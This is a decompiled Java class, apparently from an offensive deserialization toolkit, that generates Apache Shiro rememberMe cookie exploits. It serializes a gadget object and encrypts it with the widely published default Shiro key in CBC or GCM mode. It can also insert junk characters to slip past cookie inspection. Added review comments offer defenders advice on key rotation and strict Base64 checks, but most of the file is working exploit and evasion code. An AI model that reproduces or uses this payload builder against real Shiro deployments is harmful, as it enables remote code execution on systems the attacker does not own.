package com.ar3h.chains.core.payload.impl;

import ch.qos.logback.core.net.ssl.SSL;
import com.ar3h.chains.common.Payload;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.PayloadAnnotation;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;
import com.ar3h.chains.common.util.AesUtil;
import com.teradata.tdgss.jtdgss.tdgssdefines;
import java.security.NoSuchAlgorithmException;
import java.security.SecureRandom;
import java.util.Random;
import javax.crypto.Cipher;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import javax.validation.constraints.Max;
import javax.validation.constraints.Min;
import org.apache.commons.codec.binary.Base64;

/**
 * Produces the Base64 text that follows {@code rememberMe=} in an Apache Shiro cookie.
 *
 * <p>The input object is Java-serialized, encrypted under {@link #shiroKey} and Base64 encoded;
 * optionally, noise characters are then scattered through the encoded text. The annotation
 * description (kept verbatim because it is read at runtime) says, in English: returns the
 * Base64 Shiro payload that goes after {@code rememberMe=}; the target may enforce a header
 * length limit, so longer payloads may not fit; Shiro bundles CommonsBeanutils 1.9.4.
 *
 * <p>Review notes for defenders:
 * <ul>
 *   <li>The default {@link #shiroKey} is a fixed, widely published value. A Shiro deployment
 *       whose remember-me cipher key is hard-coded or published will decrypt and deserialize
 *       cookies minted by anyone who knows that key. Configure a unique, randomly generated
 *       key and keep Shiro current.</li>
 *   <li>With {@link #dirtyLength} above zero the output contains characters outside the Base64
 *       alphabet. A {@code rememberMe} value holding such characters, or an unusually long one,
 *       is a useful detection signal. Inspection layers should validate the cookie strictly
 *       against the Base64 alphabet instead of pattern-matching the raw value.</li>
 * </ul>
 *
 * <p>This source is decompiler output, so the public parameter names ({@code bArr}, {@code z},
 * and so on) are synthetic. Each method re-binds them to descriptive locals.
 */
@PayloadAnnotation(
        name = "Shiro Payload",
        description = "返回 rememberMe= 后面的 Base64 Shiro Payload\n注意目标环境可能会有header长度限制，一些比较长的Payload无法使用\nShiro 自带 CommonsBeanutils1 (CB链 1.9.4) 链",
        gadgetTags = {Tag.JavaNativeDeserialize, Tag.CustomJavaDeserialize},
        authors = {Authors.SummerSec, Authors.Ar3h},
        priority = 70)
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/core/payload/impl/ShiroPayload.class */
public class ShiroPayload<T> implements Payload<String, Object> {

    // Base64-encoded AES key (description: "ShiroKey in Base64 format").
    // The default is a fixed, publicly known key, not a secret.
    @Param(name = "ShiroKey", description = "Base64格式ShiroKey")
    public String shiroKey = "kPH+bIxk5D2deZiIxcaaaA==";

    // Selects the AES-GCM path (description: "newer Shiro, version 1.4.2, switched to AES-GCM").
    @Param(name = "GCM模式", description = "高版本 Shiro 1.4.2 版本更换为了AES-GCM加密方式", type = ParamType.Boolean)
    public boolean gcmMode = false;

    // Number of noise characters to scatter through the encoded output
    // (description: "evenly pads with the following junk characters").
    // NOTE(review): the 0..1000 bound is declared only through validation annotations;
    // whether anything enforces it is not visible in this file.
    @Max(1000)
    @Param(name = "混淆字符数量", description = "均匀填充以下垃圾字符串\n`~!@#$^&*()_-{}[]:'<>?.", type = ParamType.Integer)
    @Min(0)
    public int dirtyLength = 0;

    // Pool the noise characters are drawn from; none of them belongs to the Base64 alphabet.
    public static String dirtyString = "`~!@#$^&*()_-{}[]:'<>?.";

    /**
     * Serializes {@code obj}, encrypts it with the configured key and mode, and applies the
     * configured amount of noise.
     *
     * @param obj object handed to {@code JavaNativePayload.serialize}
     * @return the encoded cookie value
     * @throws Exception propagated from serialization or from the non-GCM encryption path
     */
    /* JADX WARN: Can't rename method to resolve collision */
    @Override // com.ar3h.chains.common.Payload
    public String marshal(Object obj) throws Exception {
        final byte[] keyBytes = Base64.decodeBase64(this.shiroKey);
        final boolean useGcm = this.gcmMode;
        final byte[] serialized = JavaNativePayload.serialize(obj);
        final String encoded = buildPayload(keyBytes, useGcm, serialized);
        return insertDirtyChar(encoded, this.dirtyLength);
    }

    /**
     * Encrypts already-serialized bytes and returns them Base64 encoded.
     *
     * @param bArr raw AES key bytes
     * @param z {@code true} for the AES-GCM path, {@code false} to delegate to {@code AesUtil.encrypt}
     * @param bArr2 serialized bytes to encrypt
     * @return Base64 text of the encrypted data
     * @throws Exception propagated from {@code AesUtil.encrypt}; the GCM path never throws
     */
    public static String buildPayload(byte[] bArr, boolean z, byte[] bArr2) throws Exception {
        final byte[] key = bArr;
        final byte[] plaintext = bArr2;
        if (z) {
            return encryptWithGcm(plaintext, key);
        }
        // NOTE(review): AesUtil is defined elsewhere; mode and IV handling are not visible here.
        final byte[] ciphertext = AesUtil.encrypt(plaintext, key);
        return Base64.encodeBase64String(ciphertext);
    }

    /**
     * Encrypts with AES-GCM using a fresh 16-byte IV and a 128-bit tag, then Base64 encodes
     * the IV followed by the cipher output.
     *
     * <p>Note the argument order is the reverse of {@link #buildPayload}: data first, key second.
     *
     * @param bArr bytes to encrypt
     * @param bArr2 raw AES key bytes
     * @return Base64 text, or the literal string {@code "0"} when any step fails. The failure
     *     cause is discarded, so callers cannot tell a bad key from a provider problem.
     */
    public static String encryptWithGcm(byte[] bArr, byte[] bArr2) {
        final byte[] plaintext = bArr;
        final byte[] key = bArr2;
        try {
            final byte[] iv = generateInitializationVector();
            // NOTE(review): tdgssdefines.ALGORITHMNAME_AES comes from an unrelated library and is
            // presumably a decompiler constant-matching artifact for the algorithm name. Confirm.
            final SecretKeySpec keySpec = new SecretKeySpec(key, tdgssdefines.ALGORITHMNAME_AES);
            final Cipher gcm = Cipher.getInstance("AES/GCM/PKCS5Padding");
            gcm.init(Cipher.ENCRYPT_MODE, keySpec, new GCMParameterSpec(128, iv));
            final byte[] framed = byteMerger(iv, gcm.doFinal(plaintext));
            return new String(org.apache.shiro.codec.Base64.encode(framed));
        } catch (Exception e) {
            return "0";
        }
    }

    /** Returns a new array holding {@code bArr} followed by {@code bArr2}. */
    private static byte[] byteMerger(byte[] bArr, byte[] bArr2) {
        final byte[] head = bArr;
        final byte[] tail = bArr2;
        final byte[] joined = java.util.Arrays.copyOf(head, head.length + tail.length);
        System.arraycopy(tail, 0, joined, head.length, tail.length);
        return joined;
    }

    /** Returns 16 random bytes drawn from {@link #getDefaultSecureRandom()}. */
    private static byte[] generateInitializationVector() {
        final byte[] iv = new byte[16];
        final SecureRandom rng = getDefaultSecureRandom();
        rng.nextBytes(iv);
        return iv;
    }

    /**
     * Returns a {@link SecureRandom} for the algorithm named by
     * {@code SSL.DEFAULT_SECURE_RANDOM_ALGORITHM}, or the platform default when that
     * algorithm is unavailable.
     */
    private static SecureRandom getDefaultSecureRandom() {
        SecureRandom rng;
        try {
            // NOTE(review): the constant is borrowed from logback and is presumably another
            // decompiler artifact; its value is not visible in this file.
            rng = SecureRandom.getInstance(SSL.DEFAULT_SECURE_RANDOM_ALGORITHM);
        } catch (NoSuchAlgorithmException e) {
            rng = new SecureRandom();
        }
        return rng;
    }

    /**
     * Inserts {@code i} characters from {@link #dirtyString} at random positions in {@code str}.
     *
     * <p>The inserted characters are outside the Base64 alphabet, so the result is no longer
     * strict Base64. Presumably this relies on the receiving decoder skipping such characters;
     * a strict alphabet check on the cookie value rejects the output.
     *
     * @param str encoded text to modify
     * @param i number of characters to insert; {@code 0} returns {@code str} itself, and a
     *     negative value returns an unmodified copy
     * @return the text with the noise characters inserted
     */
    public String insertDirtyChar(String str, int i) {
        if (i == 0) {
            return str;
        }
        final StringBuilder noisy = new StringBuilder(str);
        final Random picker = new Random();
        int remaining = i;
        while (remaining > 0) {
            // Position is drawn before the character, matching the original draw order.
            final int position = picker.nextInt(noisy.length() + 1);
            final char filler = dirtyString.charAt(picker.nextInt(dirtyString.length()));
            noisy.insert(position, filler);
            remaining--;
        }
        return noisy.toString();
    }
}
